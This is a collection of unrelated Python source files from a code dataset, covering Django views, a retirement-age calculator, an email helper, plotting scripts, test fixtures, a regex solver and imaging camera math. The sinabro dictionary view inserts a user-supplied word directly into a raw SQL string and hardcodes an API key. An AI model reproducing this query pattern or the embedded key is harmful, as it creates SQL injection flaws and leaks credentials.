pid=pid) \\\n .sort_by('-timestamp').field_limit('timestamp')\n\n # if user is logged in, page should show as modified\n # when annotations have changed\n latest_note = None\n if request.user.is_authenticated():\n # last update for annotations on this volume, if any\n repo = Repository()\n page = repo.get_object(pid, type=Page)\n latest_note = page.annotations().visible_to(request.user) \\\n .last_updated_time()\n\n solrtime = results[0]['timestamp'] if results.count() else None\n return solrtimestamp_or_datetime(solrtime, latest_note)\n\n\ndef solrtimestamp_or_datetime(solrtime, othertime):\n # Compare and return the more recent of a solr timestamp or an\n # annotation datetime.\n\n # convert solr timestamp to timezone-aware for comparison;\n # return the most recent of the two\n # FIXME: assuming solr stores as UTC, confirm this\n if solrtime is not None and othertime is not None:\n solrtime = timezone.make_aware(solrtime, timezone.utc)\n return max(solrtime, othertime)\n\n # if both are not set, return solr time if present\n if solrtime is not None:\n return solrtime\n\n # if nothing has been returned, return other time (could be None)\n return othertime\n\n\nbooks_models_filename = os.path.join(settings.BASE_DIR, 'readux', 'books', 'models.py')\nbooks_models_modified = datetime.datetime.fromtimestamp(os.path.getmtime(books_models_filename))\nbooks_models_md5sum = md5sum(books_models_filename)\n\ndef unapi_modified(request):\n 'last-modification time for unapi; format list or metadata for a single item'\n item_id = request.GET.get('id', None)\n\n # if no id, just lists available formats\n if item_id is None:\n # configuration is based on Volume class definition, so should only\n # change if the file has changed\n return books_models_modified\n\n # metadata for a specific record\n else:\n return volume_modified(request, item_id)\n\ndef unapi_etag(request):\n 'etag for unapi'\n item_id = request.GET.get('id', None)\n\n # if no id, just lists available formats\n if item_id is None:\n # configuration is based on Volume class definition, so should only\n # change if the file has changed\n return books_models_md5sum\n\n # metadata for a specific record\n else:\n fmt = request.GET.get('format', None)\n if fmt == 'rdf_dc':\n return datastream_etag(request, item_id, Volume.dc.id, 
type=Volume)\n\n\ndef datastream_lastmodified(request, pid, dsid, type):\n repo = Repository()\n try:\n obj = repo.get_object(pid, type=type)\n ds = obj.getDatastreamObject(dsid)\n if ds and ds.exists:\n return ds.created\n except RequestFailed:\n pass\n\ndef pdf_etag(request, pid):\n 'etag for Volume PDF datastream'\n return datastream_etag(request, pid, Volume.pdf.id)\n\ndef pdf_lastmodified(request, pid):\n 'last modified for Volume PDF datastream'\n return datastream_lastmodified(request, pid, Volume.pdf.id, Volume)\n\ndef ocr_etag(request, pid):\n 'etag for Volume OCR datastream'\n return datastream_etag(request, pid, VolumeV1_0.ocr.id)\n\ndef ocr_lastmodified(request, pid):\n 'last modified for Volume OCR datastream'\n return datastream_lastmodified(request, pid, VolumeV1_0.ocr.id, Volume)\n\n# TODO: consider full text etag/lastmodified methods that would work\n# for both volume v1.0 and v1.1; if v1.0, simple returns ocr methods\n# above; otherwise, no etag is available but last-modified could be pulled\n# from most recent solr indexed page.\n# (If this requires additional fedora api calls to determine type,\n# may be too costly.)\n\ndef page_image_etag(request, pid, **kwargs):\n 'etag for Page image datastream'\n return datastream_etag(request, pid, Page.image.id, type=Page)\n\ndef page_image_lastmodified(request, pid, **kwargs):\n 'last modified for Page image datastream'\n return datastream_lastmodified(request, pid, Page.image.id, type=Page)\n\n","sub_path":"readux/books/view_helpers.py","file_name":"view_helpers.py","file_ext":"py","file_size_in_byte":8883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"405750133","text":"##################################\r\n# Full Retirement Age Program\r\n# Cesar Carrillo\r\n##################################\r\n\r\n# Libraries\r\nimport math;\r\n\r\n# Global Variables\r\nRETIREMENT_AGES = [ (1937, (65, 0)),\r\n (1938, (65, 2)),\r\n (1939, (65, 4)),\r\n (1940, (65, 6)),\r\n (1941, (65, 8)),\r\n (1942, (65, 10)),\r\n (1943, (66, 0)),\r\n (1954, (66, 0)),\r\n (1955, (66, 2)),\r\n (1956, (66, 4)),\r\n (1957, (66, 6)),\r\n (1958, (66, 8)),\r\n (1959, (66, 10)),\r\n (1960, (67, 0)) ];\r\n\r\nMONTH_NAMES = [ \"January\",\r\n \"February\",\r\n \"March\",\r\n \"April\",\r\n \"May\",\r\n \"June\",\r\n \"July\",\r\n \"August\",\r\n \"September\",\r\n \"October\",\r\n \"November\",\r\n \"December\", ];\r\n\r\n# Input for integers only\r\ndef inputInt(prompt):\r\n integer = input(prompt);\r\n\r\n # Verify string\r\n if(integer.isnumeric()):\r\n return int(integer); # if int then return it\r\n else:\r\n print(\"\\nPlease enter an integer value\\n\");\r\n return inputInt(prompt); # if not call again\r\n\r\n# Returns the retirement age and month (YEAR, MONTH)\r\ndef findRetirementInfo(birthYear):\r\n # Go through the RETIREMENT_AGES list to\r\n # find and return the appropriate information\r\n for i in range(len(RETIREMENT_AGES)):\r\n year = RETIREMENT_AGES[i][0];\r\n age = RETIREMENT_AGES[i][1];\r\n\r\n if(birthYear == year):\r\n return age; # an exact match is found so return\r\n\r\n # because the list has a an ~11 year gap with no\r\n # months added this was the best way I thought to\r\n # check if the birthYear falls in that range\r\n # *for 1943 - 1954\r\n\r\n # make sure we are not at the end of the list\r\n # if so then return as there are no more years to check\r\n if(i >= len(RETIREMENT_AGES) - 1):\r\n return age;\r\n else:\r\n # check the current year (i) with the next year\r\n # if we are 
in between these years then we fall in\r\n # the range\r\n yearNext = RETIREMENT_AGES[i + 1][0];\r\n\r\n if(birthYear > year and birthYear < yearNext):\r\n return age;\r\n\r\n# Get the birth info from user\r\ndef requestBirthInfo():\r\n year = inputInt(\"Birth Year: \");\r\n month = inputInt(\"Birth Month: \");\r\n\r\n # the return order goes YEAR (0) then MONTH (1)\r\n return (year, month);\r\n\r\n# Calculate and return the retirementAge\r\ndef calculateRetirementDate(birthInfo, retirementInfo):\r\n # Calculate the retirement year and month by\r\n # adding the birthInfo and retirementInfo\r\n # in every function related to this program\r\n # the return order goes YEAR (0) then MONTH (1)\r\n retirementYear = retirementInfo[0] + birthInfo[0];\r\n retirementMonth = birthInfo[1] + retirementInfo[1];\r\n\r\n # If we are more than 12 months then adjust the year and months\r\n if(retirementMonth > 12):\r\n retirementYear += math.floor(retirementMonth / 12);\r\n retirementMonth -= 12;\r\n\r\n return (retirementYear, retirementMonth);\r\n\r\n# Returns month name using given month number\r\ndef getMonthName(month):\r\n return MONTH_NAMES[month - 1];\r\n\r\n# Prints the retirement information in a sentence\r\ndef printRetirementInfo(retirementInfo):\r\n retirementAge = retirementInfo[0];\r\n retirementMonth = retirementInfo[1];\r\n\r\n # Print Text\r\n retirementText = str(retirementAge);\r\n\r\n # Display months?\r\n if(retirementMonth > 0):\r\n retirementText += \" and \" + str(retirementMonth) + \" months\";\r\n\r\n print(\"Your full retirement age is\", retirementText);\r\n\r\n# Print the retirement date in a sentence\r\ndef printRetirementDate(retirementDate):\r\n print(\"this will be in\", getMonthName(retirementDate[1]), \"of\", retirementDate[0]);\r\n\r\n\r\n# Program Entry point\r\ndef main():\r\n\r\n running = True;\r\n\r\n print(\"Social Security Full Retirement Age Calculator\");\r\n\r\n while(running):\r\n print(\"-----------------------------------\");\r\n\r\n # Request info\r\n birthInfo = requestBirthInfo();\r\n\r\n # Calculate retirement age/month\r\n retirementInfo = findRetirementInfo(birthInfo[0]);\r\n\r\n # Print the info\r\n printRetirementInfo(retirementInfo);\r\n\r\n # Calculate the retirement date\r\n retirementDate = calculateRetirementDate(birthInfo, retirementInfo);\r\n\r\n # Print the retirement date\r\n printRetirementDate(retirementDate);\r\n\r\n # Ask if the program should keep running\r\n exitProgram = input(\"\\nExit program? 
(Y/N) \").lower();\r\n\r\n        if(exitProgram == 'y' or exitProgram == 'yes'):\r\n            running = False;\r\n\r\n\r\nmain(); # Run\r\n","sub_path":"retirementAge.py","file_name":"retirementAge.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"557012191","text":"from email.message import EmailMessage\nfrom smtplib import SMTP\nfrom abc import ABCMeta, abstractmethod\nimport os\n\nclass EmailSender(metaclass=ABCMeta):\n    @abstractmethod\n    def send(self,msg: EmailMessage):\n        pass\n\nclass SimpleEmailSender(EmailSender):\n\n    SMTP_SERVER_PORT:str=\"SMTP_SERVER_PORT\"\n\n    @classmethod\n    def send(cls,msg: EmailMessage):\n        server_port = os.environ[cls.SMTP_SERVER_PORT]\n        servers = server_port.split(':')\n        with SMTP(servers[0],int(servers[1])) as s:\n            s.send_message(msg)\n\nclass EmailBuilder:\n\n    _registered_email_sender: EmailSender = None\n\n    @classmethod\n    def send_html_message(cls, from_address: str,subject: str, to_address: list[str]=None, cc_address: list[str]=None,\n                          body: str=None, attachment_files: list[str] = None) -> EmailMessage:\n        email = EmailMessage()\n        email['Subject'] = subject\n        email['From'] = from_address\n        if to_address is not None and len(to_address) > 0 :\n            email['To'] = ', '.join(to_address)\n        if cc_address is not None and len(cc_address) > 0:\n            email['Cc'] = ', '.join(cc_address)\n\n        if body is not None:\n            email.set_content(body, subtype='html')\n\n        if attachment_files is not None and len(attachment_files) > 0 :\n            for filepath in attachment_files:\n                mime_type= cls.__get_mime_type(filepath)\n                with open(filepath, 'rb') as content_file:\n                    content = content_file.read()\n                    email.add_attachment(content,\n                                         maintype=mime_type['maintype'], subtype=mime_type['subtype'],\n                                         filename=filepath)\n\n        if cls._registered_email_sender is None:\n            SimpleEmailSender().send(email)\n        else:\n            cls._registered_email_sender.send(email)\n\n        return email\n\n    @classmethod\n    def register_mail_sender(cls, custom_mail_sender: EmailSender):\n        cls._registered_email_sender=custom_mail_sender\n\n    @classmethod\n    def __get_mime_type(cls, path: str) -> dict:\n        if path == '':\n            return None\n        parts = path.split('.')\n        if len(parts)<2:\n            return None\n\n        extension = parts[len(parts)-1]\n\n        applications = ['zip','pdf']\n        texts=['txt']\n        images=['png','jpeg','gif']\n\n        if extension in applications:\n            return dict(maintype='application',subtype=extension)\n        elif extension in images:\n            return dict(maintype='image',subtype=extension)\n        elif extension=='jpg':\n            return dict(maintype='image', subtype='jpeg')\n        elif extension=='html':\n            return dict(maintype='text',subtype='html')\n        elif extension in texts:\n            return dict(maintype='text',subtype='plain')\n        else:\n            return dict(maintype='application',subtype='octet-stream')","sub_path":"tests/resources/source/folder1/email_sender.py","file_name":"email_sender.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"155023588","text":"# coding:iso-8859-9 Turkish\r\n# p_31508.py: Example of drawing multiple functions using grids.\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as mp\r\nimport matplotlib.gridspec as mg\r\nfrom p_315 import Renk\r\n\r\nmp.style.use (\"dark_background\")\r\nmp.figure (figsize=(7, 4))\r\nızgara = mg.GridSpec (3, 3)\r\nX = np.linspace (0, 2 * np.pi, 200, endpoint=True)\r\nF1 = 2.8 * np.cos (X)\r\nF2 = 5 * np.sin (X)\r\nF3 = 0.3 * np.sin (X)\r\n\r\naltşekil1 = mp.subplot 
(ızgara [0, :])\r\naltşekil1.plot (X, F1, 'r-', X, F2)\r\n\r\naltşekil2 = mp.subplot (ızgara [1, :-1])\r\naltşekil2.plot (X, F3)\r\n\r\naltşekil3 = mp.subplot (ızgara [1:, -1])\r\naltşekil3.plot ([0,1,2,3,4], [0,1,10,100,1000], 'b-')\r\n\r\naltşekil4 = mp.subplot (ızgara [-1, 0])\r\naltşekil4.plot ([0,1,2,3,4], [51, 48, 0, 42, 60], 'r-')\r\n\r\naltşekil5 = mp.subplot (ızgara [-1, -2])\r\naltşekil5.plot ([0,1,2,3,4], [7.5, 7, 2, 1, 0])\r\n\r\nmp.tight_layout()\r\nmp.show()\r\n#-------------------------------------------------------------------------------------------------\r\n\r\n\r\nşekil = mp.figure (figsize=(7, 4))\r\nşekil.set_facecolor (Renk.renk())\r\nızgara = mg.GridSpec (3, 3)\r\nX = np.linspace (0, 2 * np.pi, 200, endpoint=True)\r\nF1 = 2.8 * np.cos (X)\r\nF2 = 5 * np.sin (X)\r\nF3 = 0.3 * np.sin (X)\r\n\r\naltşekil1 = şekil.add_subplot (ızgara [0, 0:3])\r\naltşekil1.set_facecolor (Renk.renk())\r\naltşekil1.plot (X, F1, 'r-', X, F2, \"y-\")\r\n\r\naltşekil2 = şekil.add_subplot (ızgara [1, 0:2])\r\naltşekil2.set_facecolor (Renk.renk())\r\naltşekil2.plot (X, F3, \"g\")\r\n\r\naltşekil3 = şekil.add_subplot (ızgara [1:3, 2])\r\naltşekil3.set_facecolor (Renk.renk())\r\naltşekil3.plot ([0,1,2,3,4], [0,1,10,100,1000], 'b-')\r\n\r\naltşekil4 = şekil.add_subplot (ızgara [2, 0])\r\naltşekil4.set_facecolor (Renk.renk())\r\naltşekil4.plot ([0,1,2,3,4], [51, 48, 0, 42, 60], 'r-')\r\n\r\naltşekil5 = şekil.add_subplot (ızgara [2, 1])\r\naltşekil5.set_facecolor (Renk.renk())\r\naltşekil5.plot ([0,1,2,3,4], [7.5, 7, 2, 1, 0], \"m\")\r\n\r\nşekil.tight_layout()\r\nmp.show()\r\n","sub_path":"Bernd Klein (520) ile Python/p_31508.py","file_name":"p_31508.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"448488727","text":"# -*- coding: utf-8 -*-\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\n\ndef index(req):\n return render(req, 'sinabro/index.html', {'title': 'Sinabro'})\n\ndef convert(req, target, word):\n import json\n from .models import Word\n\n if target in ['south', 'north']:\n query = \"\"\"\n SELECT\n *\n FROM\n sinabro_word\n WHERE\n REPLACE(%s, ' ', '')='%s'\n \"\"\" % ('south' if target == 'north' else 'north', word.replace(' ', ''))\n\n query_result = Word.objects.raw(query)\n matched_words = []\n for q in query_result:\n matched_words.append({\n 'word': q.south if target == \"south\" else q.north,\n 'description': {'word': q.south, 'mean': q.description} if q.description is not None and len(q.description) else dictionary(q.south)\n })\n\n if len(matched_words):\n result = {\n 'code': 200,\n 'target': target,\n 'original_word': word,\n 'converted_word': matched_words\n }\n else:\n result = {\n 'code': 404,\n 'err_message': 'Word not found'\n }\n else:\n result = {\n 'code': 400,\n 'err_message': 'Invalid parameters'\n }\n\n return HttpResponse(json.dumps(result))\n\ndef dictionary(word):\n from urllib.request import urlopen\n from urllib.parse import quote\n import xml.etree.ElementTree as ET\n from .models import Word\n\n key = \"F617DC1EF4D10410220D828231595C24\"\n quoted = quote(word)\n url = \"http://opendict.korean.go.kr/api/search\"\n params = {'key': key, 'q': quoted}\n\n first = True\n for k, v in params.items():\n if first:\n url += '?'\n first = False\n else:\n url += '&'\n url += k + '=' + v\n\n response = urlopen(url).read().decode('utf-8')\n parsed = ET.fromstring(response).findall('item')\n result = [{'word': item.findtext('word').replace('^', ' 
').replace('-', ''), 'mean': item.find('sense').findtext('definition')} for item in parsed]\n\n    original_word = Word.objects.filter(south=word)\n    for orig in original_word:\n        orig.description = result[0].get('mean')\n        orig.save()\n\n    return result[0]\n","sub_path":"sinabro/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"587287774","text":"\"\"\"Defines fixtures available to all tests.\"\"\"\nimport os\nimport pathlib\nimport pytest\n\nfrom flask import current_app\nfrom reddit.app import create_app\nfrom reddit.extensions import db\nfrom reddit import subreddits, threads, user, votes\nfrom unittest.mock import patch\n\n\n@pytest.fixture(scope='session')\ndef test_client(request):\n    #os.environ['FLASK_ENV'] = 'testing'\n\n    mock_app_event_init = patch('reddit.app.event_publisher.init_app')\n    mock_db_send_event = patch('reddit.database.event_publisher.send_event')\n    mock_db_cache = patch('reddit.database.cache.set')\n\n    mock_app_event_init.start()\n    mock_db_send_event.start()\n    mock_db_cache.start()\n\n    mock_app_event_init.return_value = True\n    mock_db_send_event.return_value = True\n\n    #mock_db_cache.set = log_mock\n\n    app = create_app()\n    test_client = app.test_client()\n    ctx = app.app_context()\n    ctx.push()\n\n    request.addfinalizer(lambda: ctx.pop())\n\n    yield test_client\n\n\n@pytest.fixture(scope=\"session\")\ndef test_database(request, test_client):\n    db.create_all()\n\n    def tear_down():\n        db.drop_all()\n        # Hack for sqlite always placing database in app directory rather than root\n        database_uri = current_app.config['SQLALCHEMY_DATABASE_URI']\n        if database_uri.startswith('sqlite'):\n            db_path = database_uri.replace('sqlite:///', '', 1)\n            db_name = pathlib.Path(db_path).name\n            for dirname, _, filenames in os.walk('.'):\n                for filename in filenames:\n                    if filename == db_name:\n                        os.remove(os.path.join(dirname, filename))\n                        return\n\n    request.addfinalizer(tear_down)\n\n    yield db\n\n\n@pytest.fixture(scope='module')\ndef test_data(test_database):\n    user1 = user.models.User(username='user_test1', email='test1@gmail.com', password='password')\n    user2 = user.models.User(username='user_test2', email='test2@gmail.com', password='password')\n    user1.save()\n    user2.save()\n\n    sub1 = subreddits.models.Subreddit(\n        name='test_sub1',\n        description='A subreddit for testing.',\n        creator_id=user1.id\n    )\n\n    thread1 = threads.models.Thread(\n        title='test_thread',\n        description='A thread for testing',\n        author_id=user1.id,\n        subreddit=sub1\n    )\n\n    data = {'users': [user1, user2],\n            'subreddits': [sub1],\n            'threads': [thread1]}\n\n    for key, models in data.items():\n        for instance in models:\n            if key != 'users':\n                instance.save()\n\n    yield data\n\n    for key, models in data.items():\n        for instance in models:\n            instance.delete()\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"79314695","text":"\"\"\"\n// Time Complexity : O(len(s)*len(p))\n// Space Complexity : O(len(s)*len(p))\n// Did this code successfully run on Leetcode : Yes\n// Any problem you faced while coding this : No\n\n// Your code here along with comments explaining your approach\nAlgorithm Explanation\nGiven below - DP\n\"\"\"\nclass Solution:\n    def isMatch(self, s: str, p: str) -> bool:\n        \"\"\"\n        Main idea is we can break down each ch* into two decision making mode - 0 char or 
1 char, since we can expand the string on * at each recursive level, we can get overlapping subproblems with result string/intermediate string acts as subproblem ->DP\n Tabulation method\n - Create a dp array, dp[s.length+1][p.length+1] consisting of False values\n - dp[0][0] = T (blank matches blank)\n - Fill the first row of dp\n If the last element of p == '*'\n dp[0][j] = dp[0][j-2] // go 2 places back such that string before start of * is covered eg _c*a* _c* (for a*) would have been computed before\n - For row = 1 to dp.length\n For col = 1 to dp[0].length\n If current char is not a star \n - s[row-1] == p[col-1] \n dp[row][col] = dp[row-1][col-1]\n else:\n dp[row][col] = dp[row][col-2] #fetching the value corresponding to zero for *\n if s[row-1] == p[col-2] or p[col-2] == '.': # case for considering 1\n dp[row][col] = dp[row][col] or dp[row-1][col]\n \n - return dp[dp.length-1][dp[0].length-1] \n \"\"\"\n dp = [[False for _ in range(len(p)+1)] for _ in range(len(s)+1)]\n dp[0][0] = True\n for j in range(1,len(dp[0])):\n if p[j-1] == '*':\n dp[0][j] = dp[0][j-2]\n \n for i in range(1,len(dp)):\n for j in range(1,len(dp[0])):\n #current char in pattern not a star\n if s[i-1] == p[j-1] or p[j-1] == '.':\n dp[i][j] = dp[i-1][j-1]\n elif p[j-1] == '*':\n dp[i][j] = dp[i][j-2] # getting the value for 0 case\n \n #check for case 1 for *\n if s[i-1] == p[j-2] or p[j-2] == '.':\n dp[i][j] |= dp[i-1][j]\n return dp[len(dp)-1][len(dp[0])-1]","sub_path":"regular_expression.py","file_name":"regular_expression.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"238188983","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\n This Class is mainly to do camera position for VR and MPR.\n\"\"\"\nimport numpy as np\nimport render_common\nfrom vtk import *\n\n\nclass FovInfo:\n def __init__(self):\n self.ExtentLen = 1 # milimeter\n self.Spacing = 1 # spacing\n self.vecInPatient = [0, 0, 1] # real Ori in Patient Coord\n self.vecInPatientOrth = [0, 0, 1]\n self.vVolumeCoord = render_common.AxisType.Z_POS\n\n self._axis_head = [0.0, 0.0, 1.0]\n self._axis_left = [1.0, 0.0, 1.0]\n self._axis_anterior = [0.0, -1.0, 0.0]\n\n def get_fov_info(self, dim, spacing, orientation, AxisType, AxisPosType):\n \"\"\"\n According to AxisType, Get FovInfo Value\n :param dim:\n :param spacing:\n :param orientation:\n :param AxisType: X_NEG = 0 X_POS = 1 Y_NEG = 2 Y_POS = 3 Z_NEG = 4 Z_POS = 5\n :param AxisPosType: POS_RIGTH = 0 POS_LEFT = 1 POS_ANTERIOR = 2 POS_POSTERIOR = 3 POS_FOOT = 4 POS_HEAD = 5\n :return:\n \"\"\"\n if AxisType is render_common.AxisType.X_POS:\n self.ExtentLen = dim[0] * spacing[0]\n self.Spacing = spacing[0]\n self.vecInPatient = orientation[0]\n self.vecInPatientOrth = render_common.AxisValue.axis_vlaue[AxisPosType]\n self.vVolumeCoord = render_common.AxisType.X_POS\n elif AxisType is render_common.AxisType.X_NEG:\n self.ExtentLen = dim[0] * spacing[0]\n self.Spacing = spacing[0]\n self.vecInPatient = - orientation[0]\n self.vecInPatientOrth = - render_common.AxisValue.axis_vlaue[AxisPosType]\n self.vVolumeCoord = render_common.AxisType.X_NEG\n elif AxisType is render_common.AxisType.Y_POS:\n self.ExtentLen = dim[1] * spacing[1]\n self.Spacing = spacing[1]\n self.vecInPatient = orientation[1]\n self.vecInPatientOrth = render_common.AxisValue.axis_vlaue[AxisPosType]\n self.vVolumeCoord = render_common.AxisType.Y_POS\n elif AxisType is render_common.AxisType.Y_NEG:\n self.ExtentLen = dim[1] * 
spacing[1]\n self.Spacing = spacing[1]\n self.vecInPatient = - orientation[1]\n self.vecInPatientOrth = render_common.AxisValue.axis_vlaue[AxisPosType] * -1\n self.vVolumeCoord = render_common.AxisType.Y_NEG\n elif AxisType is render_common.AxisType.Z_POS:\n self.ExtentLen = dim[2] * spacing[2]\n self.Spacing = spacing[2]\n self.vecInPatient = orientation[2]\n self.vecInPatientOrth = render_common.AxisValue.axis_vlaue[AxisPosType]\n self.vVolumeCoord = render_common.AxisType.Z_POS\n elif AxisType is render_common.AxisType.Z_NEG:\n self.ExtentLen = dim[2] * spacing[2]\n self.Spacing = spacing[2]\n self.vecInPatient = - orientation[2]\n self.vecInPatientOrth = - render_common.AxisValue.axis_vlaue[AxisPosType]\n self.vVolumeCoord = render_common.AxisType.Z_NEG\n return self\n\n\ndef cal_nearest_axis(dim, spacing, orientation, FovHead, FovLeft, FovAnterior):\n \"\"\"\n By Calculating the projection of volume orientation in the patient XYZ Axis, we can get the volume 是\n 体数据是侧卧,还是背卧,还是正躺等\n 确定与病人头方向、左方向、前方向最为接近的volume坐标系下的坐标轴及三个轴方向在病人坐标系下实际方向\n :param dim:\n :param spacing:\n :param orientation:\n :param FovHead: 与病人头方向最为接近的volume坐标系下的坐标轴及该轴方向在病人坐标系下实际方向\n :param FovLeft: 与病人左方向最为接近的volume坐标系下的坐标轴及该轴方向在病人坐标系下实际方向\n :param FovAnterior: 与病人前方向最为接近的volume坐标系下的坐标轴及该轴方向在病人坐标系下实际方向\n :return:\n \"\"\"\n left_patient_coord = [1, 0, 0]\n anterior_patient_coord = [0, -1, 0]\n head_patient_coord = [0, 0, 1]\n orientation[0] = orientation[0] / np.linalg.norm(orientation[0]) # normalize of orientation\n orientation[1] = orientation[1] / np.linalg.norm(orientation[1]) # normalize of orientation\n orientation[2] = orientation[2] / np.linalg.norm(orientation[2]) # normalize of orientation\n volume_x_head = np.dot(orientation[0], head_patient_coord)\n volume_y_head = np.dot(orientation[1], head_patient_coord)\n volume_z_head = np.dot(orientation[2], head_patient_coord)\n volume_x_left = np.dot(orientation[0], left_patient_coord)\n volume_y_left = np.dot(orientation[1], left_patient_coord)\n volume_z_left = np.dot(orientation[2], left_patient_coord)\n volume_x_anterior = np.dot(orientation[0], anterior_patient_coord)\n volume_y_anterior = np.dot(orientation[1], anterior_patient_coord)\n volume_z_anterior = np.dot(orientation[2], anterior_patient_coord)\n\n # Priority is TRA > COR > SAG.\n if np.abs(volume_z_head) > np.abs(volume_y_head) and np.abs(np.abs(volume_z_head)) > np.abs(volume_x_head):\n if volume_z_head > 0:\n FovHead.vVolumeCoord = render_common.AxisType.Z_POS\n else:\n FovHead.vVolumeCoord = render_common.AxisType.Z_NEG\n if np.abs(volume_x_left) > np.abs(volume_y_left):\n if volume_x_left > 0:\n FovLeft.vVolumeCoord = render_common.AxisType.X_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.X_NEG\n if volume_y_anterior > 0:\n FovAnterior.vVolumeCoord = render_common.AxisType.Y_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.Y_NEG\n else:\n if volume_y_left > 0:\n FovLeft.vVolumeCoord = render_common.AxisType.Y_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.Y_NEG\n if volume_x_anterior > 0:\n FovAnterior.vVolumeCoord = render_common.AxisType.X_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.X_NEG\n elif np.abs(volume_y_head) > np.abs(volume_x_head) and np.abs(volume_y_head) > np.abs(volume_z_head):\n if volume_y_head > 0:\n FovHead.vVolumeCoord = render_common.AxisType.Y_POS\n else:\n FovHead.vVolumeCoord = render_common.AxisType.Y_NEG\n if np.abs(volume_x_left) > np.abs(volume_z_left):\n if volume_x_left > 0:\n FovLeft.vVolumeCoord = 
render_common.AxisType.X_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.X_NEG\n if volume_z_anterior > 0:\n FovAnterior.vVolumeCoord = render_common.AxisType.Z_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.Z_NEG\n else:\n if volume_z_left > 0:\n FovLeft.vVolumeCoord = render_common.AxisType.Z_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.Z_NEG\n if volume_z_anterior > 0:\n FovAnterior.vVolumeCoord = render_common.AxisType.X_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.X_NEG\n else:\n if volume_x_head > 0:\n FovHead.vVolumeCoord = render_common.AxisType.X_POS\n else:\n FovHead.vVolumeCoord = render_common.AxisType.X_NEG\n if np.abs(volume_y_left) > np.abs(volume_z_left):\n if volume_y_left > 0:\n FovLeft.vVolumeCoord = render_common.AxisType.Y_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.Y_NEG\n if volume_z_anterior > 0:\n FovAnterior.vVolumeCoord = render_common.AxisType.Z_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.Z_NEG\n else:\n if volume_z_left > 0:\n FovLeft.vVolumeCoord = render_common.AxisType.Z_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.Z_NEG\n if volume_y_anterior > 0:\n FovAnterior.vVolumeCoord = render_common.AxisType.Y_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.Y_NEG\n\n # int(render_common.PatientPositionType.POS_HEAD)\n fov_head = FovHead.get_fov_info(dim, spacing, orientation, FovHead.vVolumeCoord, 5)\n # int(render_common.PatientPositionType.POS_LEFT)\n fov_left = FovLeft.get_fov_info(dim, spacing, orientation, FovLeft.vVolumeCoord, 1)\n # int(render_common.PatientPositionType.POS_ANTERIOR)\n fov_anterior = FovAnterior.get_fov_info(dim, spacing, orientation, FovAnterior.vVolumeCoord, 2)\n return fov_head, fov_left, fov_anterior\n\n\ndef get_default_camera_lookat(fovinfo_head, fovinfo_left, fovinfo_anterior, pos_type, center):\n \"\"\"\n According to fovinfo_head, fovinfo_left, fovinfo_anterior to get camera lookat point\n :param fovinfo_head:\n :param fovinfo_left:\n :param fovinfo_anterior:\n :param pos_type: PositionType\n :param ptlookat:\n :return:\n \"\"\"\n look_at_point = center\n if pos_type is render_common.PositionType.SAGITTAL:\n view_dir = - fovinfo_left.vecInPatient\n view_dir = view_dir / np.linalg.norm(view_dir)\n # +0.5是为了消除double数计算所带来的精度误差\n sag_dim = int(fovinfo_left.ExtentLen / fovinfo_left.Spacing + 0.5)\n if (sag_dim % 2) is True:\n look_at_point -= view_dir * 0.5 * fovinfo_left.Spacing\n elif pos_type is render_common.PositionType.TRANSVERSAL:\n view_dir = - fovinfo_head.vecInPatient\n view_dir = view_dir / np.linalg.norm(view_dir)\n tra_dim = int(fovinfo_head.ExtentLen / fovinfo_head.Spacing + 0.5)\n if (tra_dim % 2) is True:\n look_at_point -= view_dir * 0.5 * fovinfo_head.Spacing\n else:\n view_dir = - fovinfo_anterior.vecInPatient\n view_dir = view_dir / np.linalg.norm(view_dir)\n ant_dim = int(fovinfo_anterior.ExtentLen / fovinfo_anterior.Spacing + 0.5)\n if (ant_dim % 2) is True:\n look_at_point -= view_dir * 0.5 * fovinfo_anterior.Spacing\n return look_at_point\n\n\ndef check_orthogonal(orientation):\n \"\"\"\n Check Volume is Orthogonal. 
